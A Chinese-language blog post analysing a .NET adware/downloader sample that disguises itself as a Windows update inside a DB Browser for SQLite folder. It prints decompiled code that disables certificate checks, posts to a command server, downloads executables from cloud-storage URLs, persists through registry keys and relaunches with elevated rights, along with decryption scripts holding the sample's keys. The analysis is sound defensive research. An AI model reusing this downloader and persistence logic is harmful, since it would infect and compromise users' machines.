最近好忙,把之前做的一个分析发出来吧。是一个朋友给我发的。在这个样本里也学到不少东西。

Publisher sample

沙盒报告

Hybrid沙盒报告

https://hybrid-analysis.com/sample/0869692793e8940ae58615f19957da715c053e7f3e1d5f2aa7d64ea2a9bb077b/62f61284b774d475fc58f872

vt报告

https://www.virustotal.com/gui/file/0869692793e8940ae58615f19957da715c053e7f3e1d5f2aa7d64ea2a9bb077b/relations

网络行为

  • 访问google.com探测网络情况。

  • 访问hxxps://connectini.net/series/conumer4publisher.php广告页面

![image-20220812165146168](/Users/scr1pt/Library/Application Support/typora-user-images/image-20220812165146168.png)

修改内核

image-20220812165737620

在nsi.dll中检测到hook钩子,NSI User-mode interface DLL

image-20220812165804875

从程序中提取出该dll

image-20220812170155451

静态分析

定时启动edge并访问网站

image-20220812162607011

反混淆

通过de4dot检测出为.NET Reactor混淆。

1
2
3
4
5
C:\Users\Scr1pt\Desktop\de4dot-master\Release\net45>de4dot.exe Wycuwaeqaetae.exe -d

de4dot v3.1.41592.3405

Detected .NET Reactor (C:\Users\Scr1pt\Desktop\de4dot-master\Release\net45\Wycuwaeqaetae.exe)

脱壳完成后如下

image-20221222132946480

代码分析

main函数

1
2
3
4
5
6
7
8
private static void Main(string[] args)
{
	Class1.smethod_19(Assembly.GetExecutingAssembly().Location);
	Class1.smethod_5(Class7.smethod_0());
	Class4.smethod_0();
	Class4.smethod_2();
	Class2.smethod_1(args);
}
  • 调用Class2.smethod_1并传入参数args

class2中核心代码功能

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
public static List<string> smethod_2()
	{
		RegistryKey registryKey;
		if (Class1.smethod_4())
		{
			registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\WOW6432Node\\Clients\\StartMenuInternet");
		}
		else
		{
			registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Clients\\StartMenuInternet");
		}
		List<string> list = new List<string>();
		foreach (string str in registryKey.GetSubKeyNames())
		{
			RegistryKey registryKey2 = registryKey.OpenSubKey(str + "\\DefaultIcon");
			if (registryKey2 != null)
			{
				object value = registryKey2.GetValue(null);
				if (value != null)
				{
					string text = value as string;
					if (text.Contains(".exe"))
					{
						int num = text.LastIndexOf(".exe");
						if (num >= 0)
						{
							text = text.Substring(0, num + 4);
						}
						list.Add(text);
					}
				}
			}
		}
		return list;
	}

找到菜单里的浏览器如

image-20220815105118675

找到操作系统默认浏览器

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
```



![image-20220815105624929](/Users/scr1pt/Library/Application Support/typora-user-images/image-20220815105624929.png)



- 

![image-20220815104407263](https://scr1pt-1302658871.cos.ap-chengdu.myqcloud.com/img/image-20220815104407263.png)

解密信息

```c#
private static void smethod_3(string[] string_0)
	{
		string[] array;
		if (string.Join("", string_0).ToLower().Equals("/static"))
		{
			array = Class3.smethod_1("MfH/416BjL3duVScX5KRh+n3oH+zTD2HchoneRO79NT78OB4DF7SPDLH2HP7tCOzC9uHnKFXRLOeH/W0tKJ9SQ==");
		}
		else if (string.Join("", string_0).ToLower().Equals("/didane"))
		{
			array = Class3.smethod_1("dk0zM/j9YXI/r3xvxYqCkOVUzmdKicdnCO6HZa65jHQZ7c1c6GjaeyWt3WU3HGBCrc06Do2MNvANBpwRBGI21A==");
		}
		else if (string.Join("", string_0).ToLower().Equals("/noat"))
		{
			array = Class3.smethod_1("0TaZdn4GCR7imkFl+dvHP+rvvoZiV4u3LWOO00sqcdDOPUZ3NsBt9Gvi3res469eUgoV22XsJ5K9mly4ZPfEyA==");
		}
		else
		{
			array = Class3.smethod_0();
		}
		Class1.string_2 = "1";
		Class1.smethod_17(array[1]);
		Class1.smethod_9(array[0]);
		Class1.object_1 = array[3];
		Class1.object_0 = array[4];
		Class1.smethod_13(array[5]);
		Class1.smethod_15(string.Concat(new string[]
		{
			"_",
			array[0],
			"_",
			array[1],
			"_",
			array[3],
			"_",
			Class1.object_0
		}));
	}

编写脚本进行解密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

namespace Application
{
    class Program
    {
        static void Main(string[] args)
        {
            string string_0 = "base64";
            //string_0.Replace(" ", "+");
            RijndaelManaged rijndaelManaged = new RijndaelManaged();
            rijndaelManaged.Padding = PaddingMode.Zeros;
            rijndaelManaged.Mode = CipherMode.CBC;
            rijndaelManaged.KeySize = 256;
            rijndaelManaged.BlockSize = 256;
            byte[] rgbKey = Convert.FromBase64String("qFHOogTyxI+U+0mWctzFngMWGgWUj5BB8bT2UlmnG5k=");
            byte[] rgbIV = Convert.FromBase64String("v9WVEt44bKrmHGpayCh40DodYqxlcDTF9lGIduUh0Zw=");
            ICryptoTransform transform = rijndaelManaged.CreateDecryptor(rgbKey, rgbIV);
            byte[] array = Convert.FromBase64String(string_0);
            byte[] array2 = new byte[array.Length];
            new CryptoStream(new MemoryStream(array), transform, CryptoStreamMode.Read).Read(array2, 0, array2.Length);
            byte[] tt = new byte[array2.Length];
            for (int i = 0; i < array2.Length; i++)
            {
                Console.Write(Convert.ToChar(array2[i]));
            }
        }
    }
}
# lylal_chlyal_2_irecord_goodchannel_TN
# partner2_channel2_1_ProZipper_saleschannel1_TN
# publisher1_channel1_3_systemtools_normale_TN

解密了字符串后,调用网络函数

1
Config_CPM_To_Work_ID__njnghyznt58gkup7hpx5 PBM = Class9.smethod_1();
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
public static Config_CPM_To_Work_ID__njnghyznt58gkup7hpx5 smethod_1()
{
	ServicePointManager.ServerCertificateValidationCallback = ((object <p0>, X509Certificate <p1>, X509Chain <p2>, SslPolicyErrors <p3>) => true);
	HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create("https://connectini.net/Series/Conumer4Publisher.php");
	httpWebRequest.Method = "POST";
	httpWebRequest.ContentType = "application/x-www-form-urlencoded";
	string s = "jiglibaf=" + Class5.smethod_1(Class1.smethod_16());
	HttpRequestCachePolicy cachePolicy = new HttpRequestCachePolicy(HttpRequestCacheLevel.NoCacheNoStore);
	httpWebRequest.CachePolicy = cachePolicy;
	byte[] bytes = Encoding.UTF8.GetBytes(s);
	httpWebRequest.ContentLength = (long)bytes.Length;
	httpWebRequest.GetRequestStream().Write(bytes, 0, bytes.Length);
	Stream responseStream = httpWebRequest.GetResponse().GetResponseStream();
	StreamReader streamReader = new StreamReader(responseStream);
	string text = string.Empty;
	text = streamReader.ReadToEnd();
	responseStream.Dispose();
	streamReader.Dispose();
	text = Regex.Replace(text, "false", "");
	text = Class5.smethod_0(text);
	text = Regex.Replace(text, "[^\\u0009^\\u000A^\\u000D^\\u0020-\\u007E]", "");
	return JsonConvert.DeserializeObject<Config_CPM_To_Work_ID__njnghyznt58gkup7hpx5>(text);
}

访问如下ip和域名

image-20220815144008940

重要的注册表,从中分析出该病毒共有四个部分

1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Recovery

image-20220815150950882

动态分析

DpEditor程序在运行后会自动提权

image-20220815113714919

设置策略ASLR

image-20220815103620364

信息搜集

读取剪贴板

image-20220815103758599

handler sample

starter样本为C:\Program Files (x86)\DB Browser for SQLite\Fabyshamyne.exe

handler样本会调用windows updater样本,也就是updater样本

main

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
// Class4
// Token: 0x0600000C RID: 12 RVA: 0x00002874 File Offset: 0x00000A74
[STAThread]
private static void Main()
{
	try
	{
		string string_ = "LK2zlxjoHgSvPDPzD/qbov81CGp3Bi70VrPYVKti99GC/u1I1h5UUXgPadFJq3Y7TASY0TYW93yZdrHvTUoCai5Ui2oS9f2dz8QRzaQiAXg=";
		string string_2 = "FxA/rmRZZ6Y4L9w5VHSRiBcH8zbKDGf/aidAUz74ZE422DhHo95R/gCXtBy7gwKqKy5Hf/Wt8RK2fLMOEq5Natt1mf3GX1zVWHH1G4KsglU=";
		Console.WriteLine(Class3.smethod_1(string_));
		Console.WriteLine(Class3.smethod_1(string_2));
		Class4.smethod_0();
		string directoryName = Path.GetDirectoryName(Assembly.GetExecutingAssembly().Location);
		Class5.smethod_0("starter", Assembly.GetExecutingAssembly().Location);
		string text = Path.Combine(directoryName, "Windows__Update.exe");
		text = Class5.smethod_0("setter", text);
		if (!Class2.smethod_0(Class3.smethod_1(string_), text))
		{
			Class2.smethod_0(Class3.smethod_1(string_2), text);
		}
		Class1.smethod_0(text + ".config");
		Class2.smethod_1(text, null);
	}
	catch (Exception)
	{
	}
}

编写解密函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

namespace Application
{
    class Program
    {
        static void decrypt(string enc)
        {
            enc.Replace(" ", "+");

            RijndaelManaged rijndaelManaged = new RijndaelManaged();
            rijndaelManaged.Padding = PaddingMode.Zeros;
            rijndaelManaged.Mode = CipherMode.CBC;
            rijndaelManaged.KeySize = 256;
            rijndaelManaged.BlockSize = 256;
            byte[] rgbKey = Convert.FromBase64String("qFHOogTyxI+U+0mWctzFngMWGgWUj5BB8bT2UlmnG5k=");
            byte[] rgbIV = Convert.FromBase64String("v9WVEt44bKrmHGpayCh40DodYqxlcDTF9lGIduUh0Zw=");
            ICryptoTransform transform = rijndaelManaged.CreateDecryptor(rgbKey, rgbIV);
            byte[] array = Convert.FromBase64String(enc);
            byte[] array2 = new byte[array.Length];
            new CryptoStream(new MemoryStream(array), transform, CryptoStreamMode.Read).Read(array2, 0, array2.Length);
            byte[] tt = new byte[array2.Length];
            for (int i = 0; i < array2.Length; i++)
            {
                Console.Write(Convert.ToChar(array2[i]));
            }
            Console.WriteLine();

        }

        static string handler_decrypt(string string_0)
        {
            byte[] sourceArray = SHA256.Create().ComputeHash(Encoding.ASCII.GetBytes("b36LzRXR9X6Z"));
            byte[] iv = new byte[]
            {
            1,
            3,
            0,
            7,
            6,
            4,
            4,
            6,
            5,
            1,
            2,
            4,
            3,
            2,
            0,
            5
            };
            Aes aes = Aes.Create();
            aes.Mode = CipherMode.CBC;
            byte[] array = new byte[32];
            Array.Copy(sourceArray, 0, array, 0, 32);
            aes.Key = array;
            aes.IV = iv;
            MemoryStream memoryStream = new MemoryStream();
            ICryptoTransform transform = aes.CreateDecryptor();
            CryptoStream cryptoStream = new CryptoStream(memoryStream, transform, CryptoStreamMode.Write);
            string result = string.Empty;
            try
            {
                byte[] array2 = Convert.FromBase64String(string_0);
                cryptoStream.Write(array2, 0, array2.Length);
                cryptoStream.FlushFinalBlock();
                byte[] array3 = memoryStream.ToArray();
                result = Encoding.ASCII.GetString(array3, 0, array3.Length);
            }
            finally
            {
                memoryStream.Close();
                cryptoStream.Close();
            }
            return result;
        }
        static void Main(string[] args)
        {
            /*  string string_0 = "MlvMhaZlrG9HII6YGgWP7fLHhxJFm7CsGEGYUPnVxaqbS8M0xulN/0dry88yk7Go/SYljnhYGmowpBM53eqhwULf7e6ejmujjiJ/PlSAMKKJemvpV5qPR+OFC2ocC4V2";
              string string_1 = "MlvMhaZlrG9HII6YGgWP7fLHhxJFm7CsGEGYUPnVxapINYR+4YYSQXcK9aGKmGa19Tjeb054JIvz272ECLlxz8qq8ZkO5Xvo5ppqN3a/C7Kqr+ysYsk7AZJz8eVtEGLq";
              string string_2 = "Xz7eEYZ56pbTApLdtuwVh/vYezWw9MsOm0DHpIfHljMLotvx58kngmMzek0V31v9gEQKx9TAi7EZRl/nRx2kxU24PS9x8J9Plugw7higuJWDa7HRkZLrFM4e8QqST9Pn";
              string string_3 = "Xz7eEYZ56pbTApLdtuwVh/vYezWw9MsOm0DHpIfHljOACnaBf8S8JxP0eqMek5Tg9uh3iycT/umPhbpKqGQsHQ==";
              //string_0.Replace(" ", "+");
              Console.WriteLine("cors");
              decrypt(string_0);
              Console.WriteLine("reporters");

              decrypt(string_1);
              Console.WriteLine("setter");

              decrypt(string_2);
              Console.WriteLine("starter");

              decrypt(string_3);
            */
            string handler_enc_1 = "LK2zlxjoHgSvPDPzD/qbov81CGp3Bi70VrPYVKti99GC/u1I1h5UUXgPadFJq3Y7TASY0TYW93yZdrHvTUoCai5Ui2oS9f2dz8QRzaQiAXg=";
            string handler_enc_2 = "FxA/rmRZZ6Y4L9w5VHSRiBcH8zbKDGf/aidAUz74ZE422DhHo95R/gCXtBy7gwKqKy5Hf/Wt8RK2fLMOEq5Natt1mf3GX1zVWHH1G4KsglU=";

            string out_1 = handler_decrypt(handler_enc_1);
            Console.WriteLine(out_1);
            string out_2 = handler_decrypt(handler_enc_2);
            Console.WriteLine(out_2);
        }
    }
}

image-20220815153825587

涉及到两个域名, 两个都挂了

1
2
https://uchiha.s3.pl-waw.scw.cloud/madara/rec-ggqbmb8yyq32mkm8.exe
https://senju.s3.pl-waw.scw.cloud/tobirama/rec-46s6vg7zcjfe8ug4.exe

然后class4.smethod_0函数没一秒访问一次google.com

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
private static void smethod_0()
	{
		while (!Class4.smethod_1())
		{
			Thread.Sleep(1000);
		}
	}

	// Token: 0x0600000E RID: 14 RVA: 0x0000292C File Offset: 0x00000B2C
	private static bool smethod_1()
	{
		bool result;
		try
		{
			Ping ping = new Ping();
			string hostNameOrAddress = "google.com";
			byte[] buffer = new byte[32];
			PingOptions options = new PingOptions();
			result = (ping.Send(hostNameOrAddress, 1000, buffer, options).Status == IPStatus.Success);
		}
		catch (Exception)
		{
			result = false;
		}
		return result;
	}

然后去注册表里找starter键经过解密后得到starter的路径,也就是C:\Program Files (x86)\DB Browser for SQLite\Fabyshamyne.exe.然后以同样的方式寻找setter,也就是C:\Program Files (x86)\DB Browser for SQLite\Windows__Update.exe

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
internal static string smethod_0(string string_2, string string_3)
	{
		string result;
		try
		{
			RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Recovery", true);
			if (registryKey != null)
			{
				string text = (string)registryKey.GetValue(string_2);
				if (!string.IsNullOrEmpty(text))
				{
					text = Class5.smethod_2(text);
					registryKey.Close();
					if (File.Exists(text))
					{
						return text;
					}
				}
			}
			registryKey = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Recovery");
			registryKey.SetValue(string_2, Class5.smethod_1(string_3));
			result = string_3;
		}
		catch (Exception)
		{
			result = string_3;
		}
		return result;
	}

得到路径后,会发起网络行为去访问之前得到的两个域名。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
internal static bool smethod_0(string string_0, string string_1)
	{
		ServicePointManager.ServerCertificateValidationCallback = ((object <p0>, X509Certificate <p1>, X509Chain <p2>, SslPolicyErrors <p3>) => true);
		bool result;
		try
		{
			ServicePointManager.SecurityProtocol = (SecurityProtocolType)4032;
			using (WebClient webClient = new WebClient())
			{
				webClient.Headers.Add("Content-Type", "application/octet-stream");
				webClient.Headers.Add("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36;");
				webClient.DownloadFile(string_0, string_1);
			}
			result = true;
...

再写入setters的config

The runtime uses legacy CAS policy.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
internal static void smethod_0(string string_0)
	{
		string contents = string.Join(Environment.NewLine, new string[]
		{
			"<?xml version=\"1.0\" encoding=\"utf-8\" ?>",
			"<configuration>",
			"  <startup useLegacyV2RuntimeActivationPolicy=\"true\">",
			"    <supportedRuntime version=\"v2.0.50727\"/>",
			"    <!-- ",
			"    <supportedRuntime version=\"v3.5\"/>  \"The .NET Framework version 3.0 and 3.5 use version 2.0.50727 of the CLR.\"",
			"    -->",
			"    <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.0,Profile=Client\" />",
			"    <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.0\" />",
			"    <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.0.1,Profile=Client\" />",
			"    <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.0.1\" />",
			"    <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.0.2,Profile=Client\" />",
			"    <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.0.2\" />",
			"    <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.0.3,Profile=Client\" />",
			"    <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.0.3\" />",
			"    <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.5\" />",
			"    <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.5.1\" />",
			"    <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.5.2\" />",
			"    <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.6\" />",
			"    <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.6.1\" />",
			"    <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.6.2\" />",
			"    <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.7\" />",
			"    <supportedRuntime version=\"v4.0\" sku =\".NETFramework,Version=v4.7.1\" />",
			"  </startup>",
			"  <runtime>",
			"    <NetFx40_LegacySecurityPolicy enabled=\"true\"/>",
			"  </runtime>",
			"  <system.net>",
			"    <settings>",
			"      <httpWebRequest useUnsafeHeaderParsing = \"true\" />",
			"    </settings>",
			"  </system.net>",
			"</configuration>"
		});
		File.WriteAllText(string_0, contents);
	}

设置processInfo并启动进程windows__updater.exe(setter)

UseShellExecute = true

UseShellExecute = false

Verb = “runas”

  • 表示进程以管理员权限启动
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
internal static bool smethod_1(string string_0, string string_1)
	{
		ProcessStartInfo processStartInfo;
		if (string.IsNullOrEmpty(string_1))
		{
			processStartInfo = new ProcessStartInfo(string_0);
		}
		else
		{
			processStartInfo = new ProcessStartInfo(string_0, string_1);
		}
		processStartInfo.UseShellExecute = true;
		processStartInfo.Verb = "runas";
		bool result;
		try
		{
			if (Process.Start(processStartInfo) == null)
			{
				result = false;
			}
			else
...

starter sample

C:\Program Files (x86)\DB Browser for SQLite\Fabyshamyne.exe

setter sample

C:\Program Files (x86)\DB Browser for SQLite\Windows__Update.exe

main

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
// Class12
// Token: 0x06000059 RID: 89 RVA: 0x00003CEC File Offset: 0x00001EEC
[STAThread]
private static void Main(string[] args)
{
	try
	{
		Class12.smethod_0();
		Class13.smethod_0(); //设置useUnsafeHeaderParsing反射
		DateTime creationTime = File.GetCreationTime(Assembly.GetEntryAssembly().Location);
		try
		{
			string[] array = Class5.smethod_0(); //获取HKEY_CURRENT_USER\SOFTWARE\Microsoft\Etsy
			if (array == null || array.Length < 1)
			{
				throw new Exception("key mech mrigel raw");
			}
			Class7.smethod_7(array[0]);
			Class7.smethod_5(array[5]);
			Class7.smethod_3(array[2]);
			Class7.smethod_1(array[1]);
			Class7.object_0 = array[4];
			Track_tLBUlXiz3LTPMOpd track_tLBUlXiz3LTPMOpd = new Track_tLBUlXiz3LTPMOpd(string.Concat(new string[]
			{
				"Recover",
				Class7.smethod_2(),
				"_",
				Class7.smethod_6(),
				"_",
				Class7.smethod_0()
			}), "0", Class7.smethod_4());
			Class11.smethod_2();
			bool flag;
			do
			{
				flag = false;
				string value = Class9.smethod_0(creationTime, (int)(DateTime.Now - creationTime).TotalDays, Class7.smethod_4(), Class7.smethod_6(), Class7.smethod_0());
				if (!string.IsNullOrEmpty(value))
				{
					flag = Convert.ToBoolean(value);
				}
				Class6.smethod_0(flag, (int)(DateTime.Now - creationTime).TotalDays);
				Thread.Sleep((int)TimeSpan.FromHours(1.0).TotalMilliseconds);
			}
			while (!flag);
			track_tLBUlXiz3LTPMOpd.sendtrack("CheckTime", "succed");
		}
		catch (Exception)
		{
		}
	}
	catch (Exception)
	{
	}
}

获取key值并返回到array

ZiUe+wge1VAJ72v/pDJqhJiZEXHqRrfqwloqvO+GJXjcTH+kshpDQsoK+Q50NF4foeTa5fED4oRGjzZ3HaCX4Q==

image-20220815161524430

主代码逻辑到

1
2
3
4
5
6
7
8
9
10
11
12
13
bool flag;
			do
			{
				flag = false;
				string value = Class9.smethod_0(creationTime, (int)(DateTime.Now - creationTime).TotalDays, Class7.smethod_4(), Class7.smethod_6(), Class7.smethod_0());
				if (!string.IsNullOrEmpty(value))
				{
					flag = Convert.ToBoolean(value);
				}
				Class6.smethod_0(flag, (int)(DateTime.Now - creationTime).TotalDays);
				Thread.Sleep((int)TimeSpan.FromHours(1.0).TotalMilliseconds);
			}
			while (!flag);

Class9.smethod_0函数,post访问https://connectini.net/Series/za3ma_za3ma.php(存活)

image-20220815165026117

传入参数nchallahTe5dem=

本文采用CC-BY-SA-3.0协议,转载请注明出处
Author: scr1pt